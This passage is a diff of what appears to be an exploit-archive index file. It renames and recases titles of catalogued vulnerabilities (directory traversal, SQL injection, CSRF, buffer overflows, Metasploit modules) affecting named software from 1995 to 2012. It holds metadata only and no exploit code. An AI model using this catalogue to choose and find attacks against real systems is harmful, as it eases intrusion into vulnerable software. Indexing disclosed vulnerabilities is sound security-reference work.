Vulnerability",2012-08-21,loneferret,php,webapps,0 20709,platforms/php/webapps/20709.html,"OpenDocMan 1.2.6.1 - Password Change CSRF",2012-08-22,"Shai rod",php,webapps,0 -20710,platforms/php/webapps/20710.html,"VamCart v0.9 CSRF Vulnerability",2012-08-22,DaOne,php,webapps,0 +20710,platforms/php/webapps/20710.html,"VamCart 0.9 - CSRF Vulnerability",2012-08-22,DaOne,php,webapps,0 20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance learn-msg.cgi Command Injection",2012-08-22,metasploit,cgi,webapps,0 20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 Arbitrary PHP File Upload Vulnerability",2012-08-22,metasploit,php,webapps,0 -20714,platforms/cgi/remote/20714.txt,"Anaconda Clipper 3.3 Directory Traversal Vulnerability",2001-03-27,"UkR hacking team",cgi,remote,0 +20714,platforms/cgi/remote/20714.txt,"anaconda clipper 3.3 - Directory Traversal vulnerability",2001-03-27,"UkR hacking team",cgi,remote,0 20715,platforms/solaris/local/20715.txt,"Junsoft JSparm 4.0 Logging Output File Vulnerability",2001-03-23,KimYongJun,solaris,local,0 -20716,platforms/windows/remote/20716.txt,"Apache Tomcat 3.0 Directory Traversal Vulnerability",2001-03-28,lovehacker,windows,remote,0 -20717,platforms/windows/remote/20717.txt,"Elron IM Anti-Virus 3.0.3 Directory Traversal Vulnerability",2001-03-23,"Erik Tayler",windows,remote,0 +20716,platforms/windows/remote/20716.txt,"apache tomcat 3.0 - Directory Traversal vulnerability",2001-03-28,lovehacker,windows,remote,0 +20717,platforms/windows/remote/20717.txt,"elron im anti-virus 3.0.3 - Directory Traversal vulnerability",2001-03-23,"Erik Tayler",windows,remote,0 20718,platforms/unix/local/20718.txt,"MySQL 3.20.32 a/3.23.34 Root Operation Symbolic Link File Overwriting Vulnerability",2001-03-18,lesha,unix,local,0 20719,platforms/multiple/remote/20719.txt,"Tomcat 3.2.1/4.0,Weblogic Server 5.1 URL JSP Request Source Code Disclosure Vulnerability",2001-03-28,"Sverre H. Huseby",multiple,remote,0 20720,platforms/linux/local/20720.c,"Linux kernel <= 2.2.18 ptrace/execve Race Condition Vulnerability (1)",2001-03-27,"Wojciech Purczynski",linux,local,0 @@ -18046,10 +18044,10 @@ id,file,description,date,author,platform,type,port 20752,platforms/cgi/remote/20752.txt,"NCM Content Management System content.pl Input Validation Vulnerability",2001-04-13,"RA-Soft Security",cgi,remote,0 20753,platforms/cgi/remote/20753.txt,"IBM Websphere/Net.Commerce 3 CGI-BIN Macro Denial of Service Vulnerability",2001-04-13,"ET LoWNOISE",cgi,remote,0 20758,platforms/windows/remote/20758.c,"Vice City Multiplayer Server 0.3z R2 Remote Code Execution",2012-08-23,Sasuke78200,windows,remote,0 -20759,platforms/php/webapps/20759.txt,"LetoDMS 3.3.6 Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps,0 +20759,platforms/php/webapps/20759.txt,"letodms 3.3.6 - Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps,0 20760,platforms/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - (VM Applicance) Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0 20761,platforms/php/webapps/20761.txt,"Ad Manager Pro v. 4 LFI",2012-08-23,CorryL,php,webapps,0 -20762,platforms/php/webapps/20762.php,"WebPA <= 1.1.0.1 Multiple Vulnerabilities",2012-08-24,dun,php,webapps,0 +20762,platforms/php/webapps/20762.php,"webpa <= 1.1.0.1 - Multiple Vulnerabilities",2012-08-24,dun,php,webapps,0 20763,platforms/windows/dos/20763.c,"Microsoft ISA Server 2000 Web Proxy DoS Vulnerability",2001-04-16,"SecureXpert Labs",windows,dos,0 20764,platforms/solaris/remote/20764.txt,"Solaris 2.6 FTP Core Dump Shadow Password Recovery Vulnerability",2001-04-17,warning3,solaris,remote,0 20765,platforms/linux/remote/20765.pl,"Linux kernel 2.4 IPTables FTP Stateful Inspection Arbitrary Filter Rule Insertion",2001-04-16,"Cristiano Lincoln Mattos",linux,remote,0 @@ -18076,7 +18074,7 @@ id,file,description,date,author,platform,type,port 20787,platforms/php/webapps/20787.txt,"Text Exchange Pro (index.php page) Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 20788,platforms/php/webapps/20788.txt,"AB Banner Exchange (index.php page) Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 20789,platforms/php/webapps/20789.txt,"Easy Banner Pro (index.php page) Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 -20790,platforms/php/webapps/20790.py,"BusinessWiki 2.5RC3 Stored XSS & Arbitrary File Upload",2012-08-24,"Shai rod",php,webapps,0 +20790,platforms/php/webapps/20790.py,"businesswiki 2.5rc3 - Stored XSS & arbitrary file upload",2012-08-24,"Shai rod",php,webapps,0 20791,platforms/unix/remote/20791.php,"Netscape Navigator 4.0.8 'about:' Domain Information Disclosure Vulnerability",2001-04-09,"Florian Wesch",unix,remote,0 20792,platforms/multiple/dos/20792.txt,"Mercury/NLM 1.4 Buffer Overflow Vulnerability",2001-04-21,"Przemyslaw Frasunek",multiple,dos,0 20793,platforms/windows/remote/20793.txt,"RobTex Viking Server 1.0.7 Relative Path Webroot Escaping Vulnerability",2001-04-23,joetesta,windows,remote,0 @@ -18089,11 +18087,11 @@ id,file,description,date,author,platform,type,port 20800,platforms/cgi/remote/20800.c,"PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (2)",2000-01-11,missnglnk,cgi,remote,0 20801,platforms/cgi/remote/20801.c,"PowerScripts PlusMail WebConsole 1.0 Poor Authentication Vulnerability (3)",2000-01-20,ytcracker,cgi,remote,0 20802,platforms/windows/remote/20802.c,"Microsoft IIS 2.0/3.0 Long URL Denial of Service Vulnerability",1997-06-21,"Andrea Arcangeli",windows,remote,0 -20803,platforms/windows/remote/20803.txt,"RaidenFTPD 2.1 Directory Traversal Vulnerability",2001-04-25,joetesta,windows,remote,0 +20803,platforms/windows/remote/20803.txt,"raidenftpd 2.1 - Directory Traversal vulnerability",2001-04-25,joetesta,windows,remote,0 20804,platforms/irix/local/20804.c,"IRIX 5.3/6.x 'netprint' Arbitrary Shared Library Usage Vulnerability",2001-04-26,V9,irix,local,0 20805,platforms/irix/remote/20805.c,"SGI IRIX 3/4/5/6,OpenLinux 1.0/1.1 routed traceon Vulnerability",1998-10-21,Rootshell,irix,remote,0 20806,platforms/hardware/remote/20806.txt,"Tektronix Phaser 740/750/850/930 Network Printer Administration Interface Vulnerability",2001-04-25,Ltlw0lf,hardware,remote,0 -20807,platforms/multiple/remote/20807.txt,"DataWizard WebXQ 2.1.204 Directory Traversal Vulnerability",2001-04-27,joetesta,multiple,remote,0 +20807,platforms/multiple/remote/20807.txt,"datawizard webxq 2.1.204 - Directory Traversal vulnerability",2001-04-27,joetesta,multiple,remote,0 20808,platforms/cgi/remote/20808.txt,"PerlCal 2.x Directory Traversal Vulnerability",2001-04-27,ThePike,cgi,remote,0 20809,platforms/cgi/remote/20809.html,"Excite for Web Servers 1.1 Administrative Password Vulnerability",1998-11-30,"Michael Gerdts",cgi,remote,0 20810,platforms/multiple/remote/20810.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (1)",1997-11-20,m3lt,multiple,remote,0 @@ -18111,7 +18109,7 @@ id,file,description,date,author,platform,type,port 20822,platforms/linux/local/20822.sh,"Vixie Cron crontab 3.0 Privilege Lowering Failure Vulnerability (1)",2001-05-07,"Sebastian Krahmer",linux,local,0 20823,platforms/linux/local/20823.sh,"Vixie Cron crontab 3.0 Privilege Lowering Failure Vulnerability (2)",2001-07-05,cairnsc,linux,local,0 20824,platforms/hardware/dos/20824.txt,"Cisco Catalyst 2900 12.0 (5.2)XU SNMP Empty UDP Packet Denial of Service",2001-05-03,bashis,hardware,dos,0 -20825,platforms/windows/remote/20825.txt,"Michael Lamont Savant HTTP Server 2.1 Directory Traversal Vulnerability",2001-02-17,"Tom Tom",windows,remote,0 +20825,platforms/windows/remote/20825.txt,"michael lamont savant http server 2.1 - Directory Traversal vulnerability",2001-02-17,"Tom Tom",windows,remote,0 20826,platforms/windows/remote/20826.txt,"Jason Rahaim MP3Mystic 1.0.x Server Directory Traversal Vulnerability",2001-05-07,neme-dhc,windows,remote,0 20827,platforms/multiple/dos/20827.pl,"Hughes Technologies DSL_Vdns 1.0 Denial of Service Vulnerability",2001-05-07,neme-dhc,multiple,dos,0 20828,platforms/windows/dos/20828.txt,"SpyNet 6.5 Chat Server Multiple Connection Denial Of Service Vulnerability",2001-05-07,nemesystm,windows,dos,0 @@ -18143,14 +18141,14 @@ id,file,description,date,author,platform,type,port 20854,platforms/windows/dos/20854.txt,"IIS 5.0 WebDav Lock Method Memory Leak DoS Vulnerability",2001-05-17,"Defcom Labs",windows,dos,0 20855,platforms/php/webapps/20855.txt,"Wiki Web Help 0.3.9 Multiple Stored XSS Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0 20856,platforms/php/webapps/20856.txt,"XWiki 4.2-milestone-2 Multiple Stored XSS Vulnerabilities",2012-08-27,"Shai rod",php,webapps,0 -20857,platforms/php/webapps/20857.txt,"web@all CMS 2.0 Multiple Vulnerabilities",2012-08-27,LiquidWorm,php,webapps,0 +20857,platforms/php/webapps/20857.txt,"web@all CMS 2.0 - Multiple Vulnerabilities",2012-08-27,LiquidWorm,php,webapps,0 20859,platforms/php/webapps/20859.txt,"vlinks 2.0.3 (site.php id parameter) SQL Injection",2012-08-27,JiKo,php,webapps,0 20861,platforms/win64/local/20861.txt,"Microsoft Windows Kernel Intel x64 SYSRET PoC",2012-08-27,"Shahriyar Jalayeri",win64,local,0 20862,platforms/php/webapps/20862.txt,"Wordpress Count per Day Plugin 3.2.3 XSS Vulnerability",2012-08-27,Crim3R,php,webapps,0 20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 (products_name_de) Script Insertion Vulnerability",2012-08-27,LiquidWorm,php,webapps,0 20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 Community Manager Insecure File Upload",2012-08-27,"Sense of Security",asp,webapps,0 20865,platforms/java/remote/20865.rb,"Java 7 Applet Remote Code Execution",2012-08-27,metasploit,java,remote,0 -20866,platforms/php/webapps/20866.txt,"Aoop CMS 0.3.6 Multiple Vulnerabilities",2012-08-27,"Julien Ahrens",php,webapps,0 +20866,platforms/php/webapps/20866.txt,"aoop cms 0.3.6 - Multiple Vulnerabilities",2012-08-27,"Julien Ahrens",php,webapps,0 20867,platforms/linux/local/20867.txt,"ARCservIT 6.61/6.63 Client asagent.tmp Arbitrary File Overwrite Vulnerability",2001-05-18,"Jonas Eriksson",linux,local,0 20868,platforms/linux/local/20868.txt,"ARCservIT 6.61/6.63 Client inetd.tmp Arbitrary File Overwrite Vulnerability",2001-05-18,"Jonas Eriksson",linux,local,0 20869,platforms/multiple/remote/20869.html,"eSafe Gateway 2.1 Script-filtering Bypass Vulnerability",2001-05-20,"eDvice Security Services",multiple,remote,0 @@ -18161,11 +18159,11 @@ id,file,description,date,author,platform,type,port 20874,platforms/php/webapps/20874.html,"RV Shopping Cart CSRF Vulnerability",2012-08-28,DaOne,php,webapps,0 20876,platforms/windows/remote/20876.pl,"Simple Web Server 2.2-rc2 ASLR Bypass Exploit",2012-08-28,pole,windows,remote,0 20877,platforms/hardware/webapps/20877.txt,"Conceptronic Grab’n’Go and Sitecom Storage Center Password Disclosure",2012-08-28,"Mattijs van Ommeren",hardware,webapps,0 -20878,platforms/cgi/remote/20878.txt,"MIMAnet Source Viewer 2.0 Directory Traversal Vulnerability",2001-05-23,joetesta,cgi,remote,0 +20878,platforms/cgi/remote/20878.txt,"mimanet source viewer 2.0 - Directory Traversal vulnerability",2001-05-23,joetesta,cgi,remote,0 20879,platforms/unix/remote/20879.txt,"OpenServer 5.0.5/5.0.6,HP-UX 10/11,Solaris 2.6/7.0/8 rpc.yppasswdd Buffer Overrun",2001-05-10,metaray,unix,remote,0 20880,platforms/windows/local/20880.c,"MS Windows 2000 Debug Registers Vulnerability",2001-05-24,"Georgi Guninski",windows,local,0 20881,platforms/multiple/remote/20881.txt,"Beck IPC GmbH IPC@CHIP TelnetD Login Account Brute Force Vulnerability",2001-05-24,"Courtesy Sentry Research Labs",multiple,remote,0 -20882,platforms/multiple/remote/20882.txt,"Faust Informatics Freestyle Chat 4.1 SR2 Directory Traversal Vulnerability",2001-05-25,nemesystm,multiple,remote,0 +20882,platforms/multiple/remote/20882.txt,"faust informatics freestyle chat 4.1 sr2 - Directory Traversal vulnerability",2001-05-25,nemesystm,multiple,remote,0 20883,platforms/windows/dos/20883.txt,"Faust Informatics Freestyle Chat 4.1 SR2 MS-DOS Device Name DoS",2001-05-25,nemesystm,windows,dos,0 20884,platforms/windows/remote/20884.txt,"ACLogic CesarFTP 0.98 b Directory Traversal Vulnerability",2001-05-27,byterage,windows,remote,0 20885,platforms/solaris/local/20885.c,"Solaris 8 mailtool Buffer Overflow Vulnerability",2001-06-01,51,solaris,local,0 @@ -18273,7 +18271,7 @@ id,file,description,date,author,platform,type,port 20992,platforms/linux/local/20992.c,"Lmail 2.7 Temporary File Race Condition Vulnerability",2001-07-04,"Charles Stevenson",linux,local,0 20993,platforms/unix/remote/20993.c,"XFree86 X11R6 3.3 XDM Session Cookie Guessing Vulnerability",2001-06-24,"ntf & sky",unix,remote,0 20994,platforms/linux/remote/20994.txt,"Cobalt Raq3 PopRelayD Arbitrary SMTP Relay Vulnerability",2001-07-04,"Andrea Barisani",linux,remote,0 -20995,platforms/php/webapps/20995.txt,"Cobalt Qube Webmail 1.0 Directory Traversal Vulnerability",2001-07-05,kf,php,webapps,0 +20995,platforms/php/webapps/20995.txt,"cobalt qube webmail 1.0 - Directory Traversal vulnerability",2001-07-05,kf,php,webapps,0 20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 File Disclosure Vulnerability",2001-07-06,"karol _",php,webapps,0 20997,platforms/multiple/dos/20997.c,"HP-UX 11,Linux kernel 2.4,Windows 2000/NT 4.0,IRIX 6.5 Small TCP MSS DoS",2001-07-07,"Darren Reed",multiple,dos,0 20998,platforms/linux/remote/20998.c,"xloadimage 4.1 Buffer Overflow Vulnerability",2001-07-10,"zenith parsec",linux,remote,0 @@ -18283,10 +18281,10 @@ id,file,description,date,author,platform,type,port 21002,platforms/multiple/remote/21002.txt,"Apache 1.3 Possible Directory Index Disclosure Vulnerability",2001-07-10,Kevin,multiple,remote,0 21003,platforms/windows/remote/21003.txt,"Microsoft Outlook 98/2000/2002 Unauthorized Email Access Vulnerability",2001-07-12,"Georgi Guninski",windows,remote,0 21004,platforms/windows/remote/21004.txt,"Microsoft Outlook 98/2000/2002 Arbitrary Code Execution Vulnerability",2001-07-12,"Georgi Guninski",windows,remote,0 -21005,platforms/php/webapps/21005.txt,"Admidio 2.3.5 Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0 +21005,platforms/php/webapps/21005.txt,"admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0 21006,platforms/windows/dos/21006.txt,"MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2 & 5.2.1 - File Scanner Malicious Archive DoS",2001-07-12,"Michel Arboi",windows,dos,0 21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition (add_rating.php, id parameter) Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 -21008,platforms/cgi/remote/21008.txt,"Interactive Story 1.3 Directory Traversal Vulnerability",2001-07-15,qDefense,cgi,remote,0 +21008,platforms/cgi/remote/21008.txt,"interactive story 1.3 - Directory Traversal vulnerability",2001-07-15,qDefense,cgi,remote,0 21009,platforms/windows/remote/21009.c,"ArGoSoft FTP Server 1.2.2 .2 Weak Password Encryption Vulnerability",2001-07-12,byterage,windows,remote,0 21010,platforms/linux/local/21010.sh,"XFree86 X11R6 3.3.2 XMan ManPath Environment Variable Buffer Overflow",2001-06-11,kf,linux,local,0 21011,platforms/hardware/remote/21011.pl,"3Com SuperStack II PS Hub 40 TelnetD Weak Password Protection Vulnerability",2001-07-12,Siberian,hardware,remote,0 @@ -18327,7 +18325,7 @@ id,file,description,date,author,platform,type,port 21048,platforms/cgi/dos/21048.txt,"John O'Fallon Responder.cgi 1.0 DoS Vulnerability",1999-04-09,Epic,cgi,dos,0 21049,platforms/linux/remote/21049.c,"NCSA httpd 1.x Buffer Overflow Vulnerability (1)",1997-04-23,savage,linux,remote,0 21050,platforms/linux/remote/21050.c,"NCSA httpd 1.x Buffer Overflow Vulnerability (2)",1995-02-17,Xtremist,linux,remote,0 -21052,platforms/jsp/webapps/21052.txt,"JIRA 4.4.3, GreenHopper < 5.9.8 Multiple Vulnerabilities",2012-09-04,"Hoyt LLC Research",jsp,webapps,0 +21052,platforms/jsp/webapps/21052.txt,"jira 4.4.3, greenhopper < 5.9.8 - Multiple Vulnerabilities",2012-09-04,"Hoyt LLC Research",jsp,webapps,0 21053,platforms/multiple/webapps/21053.txt,"Splunk <= 4.3.3 Arbitrary File Read",2012-09-04,"Marcio Almeida",multiple,webapps,0 21054,platforms/php/webapps/21054.txt,"Support4Arabs Pages 2.0 - SQL Injection Vulnerability",2012-09-04,L0n3ly-H34rT,php,webapps,0 21056,platforms/php/webapps/21056.txt,"Group Office Calendar (calendar/json.php) SQL Injection",2012-09-04,"Chris Cooper",php,webapps,0 @@ -18356,9 +18354,9 @@ id,file,description,date,author,platform,type,port 21079,platforms/php/webapps/21079.rb,"MobileCartly 1.0 Arbitrary File Creation Vulnerability",2012-09-05,metasploit,php,webapps,0 21080,platforms/multiple/remote/21080.rb,"JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)",2012-09-05,metasploit,multiple,remote,0 21081,platforms/hardware/webapps/21081.txt,"QNAP Turbo NAS TS-1279U-RP Multiple Path Injection",2012-09-05,"Andrea Fabrizi",hardware,webapps,0 -21082,platforms/multiple/webapps/21082.txt,"Novell Sentinel Log Manager <= 1.2.0.1 Directory Traversal",2011-12-18,"Andrea Fabrizi",multiple,webapps,0 +21082,platforms/multiple/webapps/21082.txt,"novell sentinel log manager <= 1.2.0.1 - Directory Traversal",2011-12-18,"Andrea Fabrizi",multiple,webapps,0 21084,platforms/php/webapps/21084.txt,"ES Job Search Engine 3.0 - SQL Injection Vulnerability",2012-09-05,Vulnerability-Lab,php,webapps,0 -21085,platforms/asp/webapps/21085.txt,"Ektron CMS 8.5.0 Multiple Vulnerabilities",2012-09-05,"Sense of Security",asp,webapps,0 +21085,platforms/asp/webapps/21085.txt,"Ektron CMS 8.5.0 - Multiple Vulnerabilities",2012-09-05,"Sense of Security",asp,webapps,0 21088,platforms/unix/remote/21088.pl,"AOLServer 3 Long Authentication String Buffer Overflow Vulnerability (1)",2001-08-22,"Nate Haggard",unix,remote,0 21089,platforms/unix/remote/21089.c,"AOLServer 3 Long Authentication String Buffer Overflow Vulnerability (2)",2001-09-05,qitest1,unix,remote,0 21090,platforms/windows/local/21090.txt,"CuteFTP 4.2 Default Weak Password Encoding Vulnerability",2001-08-23,"E. van Elk",windows,local,0 @@ -18424,10 +18422,10 @@ id,file,description,date,author,platform,type,port 21154,platforms/multiple/remote/21154.pl,"ActivePerl 5.6.1 perlIIS.dll Buffer Overflow Vulnerability (3)",2001-11-15,Sapient2003,multiple,remote,0 21155,platforms/php/remote/21155.txt,"Network Tool 0.2 PHPNuke Addon Metacharacter Filtering Command Execution Vulnerability",2001-11-16,"Cabezon AurĂ©lien",php,remote,0 21156,platforms/windows/remote/21156.txt,"Opera 5.0/5.1 Same Origin Policy Circumvention Vulnerability",2001-11-15,"Georgi Guninski",windows,remote,0 -21157,platforms/php/webapps/21157.txt,"Bharat Mediratta Gallery 1.1/1.2 Directory Traversal Vulnerability",2001-11-19,"Cabezon Aurelien",php,webapps,0 +21157,platforms/php/webapps/21157.txt,"bharat mediratta gallery 1.1/1.2 - Directory Traversal vulnerability",2001-11-19,"Cabezon Aurelien",php,webapps,0 21158,platforms/linux/local/21158.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make Shell Definition Format String Vulnerability",2001-11-21,IhaQueR@IRCnet,linux,local,0 21159,platforms/linux/local/21159.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make Buffer Overflow Vulnerability",2001-11-21,IhaQueR@IRCnet,linux,local,0 -21160,platforms/multiple/remote/21160.txt,"IBM Informix Web Datablade 3.x/4.1 Directory Traversal Vulnerability",2001-11-22,"Beck Mr.R",multiple,remote,0 +21160,platforms/multiple/remote/21160.txt,"ibm informix web datablade 3.x/4.1 - Directory Traversal vulnerability",2001-11-22,"Beck Mr.R",multiple,remote,0 21161,platforms/unix/remote/21161.txt,"Wu-Ftpd 2.6 File Globbing Heap Corruption Vulnerability",2001-11-27,"Core Security Technologies",unix,remote,0 21162,platforms/windows/dos/21162.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 Multiple Denial Of Service Vulnerability (1)",2001-11-29,"Alex Hernandez",windows,dos,0 21163,platforms/windows/dos/21163.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 Multiple Denial Of Service Vulnerability (2)",2001-11-29,"Alex Hernandez",windows,dos,0 @@ -18450,7 +18448,7 @@ id,file,description,date,author,platform,type,port 21180,platforms/solaris/remote/21180.c,"Solaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow Vulnerability",2004-12-04,"Marco Ivaldi",solaris,remote,0 21181,platforms/multiple/dos/21181.txt,"MS IE 6.0,Mozilla 0.9.6,Opera 5.1 Image Count Denial of Service Vulnerability",2001-12-11,"Pavel Titov",multiple,dos,0 21182,platforms/novell/remote/21182.txt,"Novell Groupwise 5.5/6.0 Servlet Gateway Default Authentication Vulnerability",2001-12-15,"Adam Gray",novell,remote,0 -21183,platforms/cgi/remote/21183.txt,"Webmin 0.91 Directory Traversal Vulnerability",2001-12-17,"A. Ramos",cgi,remote,0 +21183,platforms/cgi/remote/21183.txt,"webmin 0.91 - Directory Traversal vulnerability",2001-12-17,"A. Ramos",cgi,remote,0 21184,platforms/cgi/webapps/21184.txt,"Agora.CGI 3.x/4.0 Debug Mode Cross-Site Scripting Vulnerability",2001-12-17,"Tamer Sahin",cgi,webapps,0 21185,platforms/unix/remote/21185.sh,"QPopper 4.0.x PopAuth Trace File Shell Command Execution Vulnerability",2001-12-18,IhaQueR,unix,remote,0 21186,platforms/hardware/remote/21186.txt,"ZyXEL Prestige 681 SDSL Router IP Fragment Reassembly Vulnerability",2001-12-18,"Przemyslaw Frasunek",hardware,remote,0 @@ -18556,8 +18554,8 @@ id,file,description,date,author,platform,type,port 21288,platforms/multiple/local/21288.txt,"Sawmill 6.2.x AdminPassword Insecure Default Permissions Vulnerability",2002-02-11,darky0da,multiple,local,0 21289,platforms/linux/remote/21289.c,"Ettercap 0.6.3 .1 Large Packet Buffer Overflow Vulnerability",2002-02-14,"FermĂ­n J. Serna",linux,remote,0 21290,platforms/unix/local/21290.sh,"Tarantella Enterprise 3 Symbolic Link Vulnerability",2002-02-19,"Larry W. Cashdollar",unix,local,0 -21291,platforms/windows/remote/21291.pl,"Phusion Webserver 1.0 Directory Traversal Vulnerability (1)",2002-02-16,"Alex Hernandez",windows,remote,0 -21292,platforms/windows/remote/21292.pl,"Phusion Webserver 1.0 Directory Traversal Vulnerability (2)",2002-02-16,"Alex Hernandez",windows,remote,0 +21291,platforms/windows/remote/21291.pl,"phusion webserver 1.0 - Directory Traversal vulnerability (1)",2002-02-16,"Alex Hernandez",windows,remote,0 +21292,platforms/windows/remote/21292.pl,"phusion webserver 1.0 - Directory Traversal vulnerability (2)",2002-02-16,"Alex Hernandez",windows,remote,0 21293,platforms/windows/dos/21293.pl,"Phusion Webserver 1.0 Long URL Denial Of Service Vulnerability",2002-02-16,"Alex Hernandez",windows,dos,0 21294,platforms/windows/remote/21294.c,"Phusion Webserver 1.0 Long URL Buffer Overflow Vulnerability",2002-02-16,"Alex Hernandez",windows,remote,0 21295,platforms/multiple/remote/21295.txt,"GNUJSP 1.0 File Disclosure Vulnerability",2002-02-19,"Thomas Springer",multiple,remote,0 @@ -18581,12 +18579,12 @@ id,file,description,date,author,platform,type,port 21313,platforms/windows/remote/21313.txt,"Microsoft IIS 4.0/5.0/5.1 Authentication Method Disclosure Vulnerability",2002-03-05,"David Litchfield",windows,remote,0 21314,platforms/unix/remote/21314.txt,"OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability",2002-03-07,Morgan,unix,remote,0 21316,platforms/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 -21317,platforms/php/webapps/21317.txt,"NeoBill CMS v0.8 Alpha Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 +21317,platforms/php/webapps/21317.txt,"NeoBill CMS 0.8 Alpha - Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 21318,platforms/windows/local/21318.pl,"Internet Download Manager All Versions Stack Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 21319,platforms/aix/webapps/21319.txt,"Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF",2012-09-14,modpr0be,aix,webapps,0 21320,platforms/windows/local/21320.pl,"Internet Download Manager All Versions SEH Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 21323,platforms/linux/local/21323.c,"libdbus 'DBUS_SYSTEM_BUS_ADDRESS' Local Privilege Escalation",2012-07-17,"Sebastian Krahmer",linux,local,0 -21324,platforms/php/webapps/21324.txt,"LuxCal 2.7.0 - Multiple Remote Vulnerabilities",2012-09-17,L0n3ly-H34rT,php,webapps,0 +21324,platforms/php/webapps/21324.txt,"luxcal 2.7.0 - Multiple Vulnerabilities",2012-09-17,L0n3ly-H34rT,php,webapps,0 21326,platforms/windows/dos/21326.txt,"Novell Groupwise 8.0.2 HP3 and 2012 Integer Overflow Vulnerability",2012-09-17,"Francis Provencher",windows,dos,0 21327,platforms/php/webapps/21327.txt,"webERP <= 4.08.4 - WorkOrderEntry.php SQL Injection Vulnerability",2012-09-17,modpr0be,php,webapps,0 21329,platforms/php/webapps/21329.txt,"Auxilium PetRatePro Multiple Vulnerabilities",2012-09-17,DaOne,php,webapps,0 @@ -18652,10 +18650,10 @@ id,file,description,date,author,platform,type,port 21390,platforms/cgi/remote/21390.txt,"Sambar Server 5.1 Script Source Disclosure Vulnerability",2002-04-17,pgrundl,cgi,remote,0 21391,platforms/php/webapps/21391.txt,"PVote 1.0/1.5 Poll Content Manipulation Vulnerability",2002-04-18,"Daniel Nyström",php,webapps,0 21392,platforms/windows/webapps/21392.txt,"Spiceworks 6.0.00993 Multiple Script Injection Vulnerabilities",2012-09-19,LiquidWorm,windows,webapps,0 -21393,platforms/php/webapps/21393.txt,"Wordpress Wp-TopBar 4.02 Multiple Vulnerabilities",2012-09-19,"Blake Entrekin",php,webapps,0 -21394,platforms/windows/webapps/21394.txt,"SonicWALL EMail Security 7.3.5 Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,windows,webapps,0 +21393,platforms/php/webapps/21393.txt,"wordpress wp-topbar 4.02 - Multiple Vulnerabilities",2012-09-19,"Blake Entrekin",php,webapps,0 +21394,platforms/windows/webapps/21394.txt,"sonicwall email security 7.3.5 - Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,windows,webapps,0 21395,platforms/hardware/webapps/21395.txt,"Fortigate UTM WAF Appliance Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,hardware,webapps,0 -21396,platforms/php/webapps/21396.txt,"TorrentTrader 2.08 Multiple Vulnerabilities",2012-09-19,waraxe,php,webapps,0 +21396,platforms/php/webapps/21396.txt,"torrenttrader 2.08 - Multiple Vulnerabilities",2012-09-19,waraxe,php,webapps,0 21397,platforms/php/webapps/21397.txt,"PVote 1.0/1.5 Unauthorized Administrative Password Change Vulnerability",2002-04-18,"Daniel Nyström",php,webapps,0 21398,platforms/linux/local/21398.txt,"SSH2 3.0 Restricted Shell Escaping Command Execution Vulnerability",2002-04-18,A.Dimitrov,linux,local,0 21399,platforms/php/webapps/21399.txt,"IcrediBB 1.1 Script Injection Vulnerability",2002-04-19,"Daniel Nyström",php,webapps,0 @@ -18733,7 +18731,7 @@ id,file,description,date,author,platform,type,port 21472,platforms/hardware/dos/21472.pl,"Cisco CBOS 2.x Broadband Operating System TCP/IP Stack Denial of Service Vulnerability",2002-05-23,blackangels,hardware,dos,0 21473,platforms/cgi/webapps/21473.txt,"ViewCVS 0.9.2 Cross-Site Scripting Vulnerability",2002-05-24,office,cgi,webapps,0 21474,platforms/php/webapps/21474.txt,"OpenBB 1.0 .0 RC3 BBCode Cross Agent HTML Injection Vulnerability",2002-05-24,frog,php,webapps,0 -21475,platforms/windows/remote/21475.txt,"LocalWEB2000 2.1 .0 Standard Version File Disclosure Vulnerability",2002-05-24,"Tamer Sahin",windows,remote,0 +21475,platforms/windows/remote/21475.txt,"LocalWEB2000 2.1.0 Standard - File Disclosure Vulnerability",2002-05-24,"Tamer Sahin",windows,remote,0 21476,platforms/linux/dos/21476.c,"Sendmail 8.9.x/8.10.x/8.11.x/8.12.x File Locking Denial Of Service Vulnerability (1)",2002-05-24,zillion,linux,dos,0 21477,platforms/linux/dos/21477.c,"Sendmail 8.9.x/8.10.x/8.11.x/8.12.x File Locking Denial Of Service Vulnerability (2)",2002-05-24,zillion,linux,dos,0 21478,platforms/php/webapps/21478.txt,"OpenBB 1.0 Unauthorized Moderator Access Vulnerability",2002-05-24,frog,php,webapps,0 @@ 